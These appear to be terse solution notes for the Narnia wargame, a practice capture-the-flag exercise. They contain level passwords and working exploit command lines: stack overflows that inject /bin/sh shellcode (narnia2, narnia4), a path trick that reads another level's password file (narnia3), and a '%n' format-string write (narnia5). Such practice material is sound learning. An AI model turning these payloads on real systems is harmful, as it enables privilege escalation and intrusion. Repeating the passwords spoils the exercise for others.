efeidiedae
nairiepecu
env -i COLUMNS=364 PWD=/narnia LINES=80 /narnia/narnia2 `python -c 'print "A"*20+"\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"+"A"*88+"\x28\xdd\xff\xff"'`

vaequeezee
/narnia/narnia3 /etc/narnia_pass////////////////narnia4

thaenohtai
env -i COLUMNS=364 PWD=/narnia LINES=80 /narnia/narnia4 `python -c 'print "\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"+"A"*240+"\x24\xdc\xff\xff"'`

faimahchiy

./narnia5 `python -c 'print "\xa0\xd4\xff\xff"+"x"*496+"%n"'`
neezocaeng
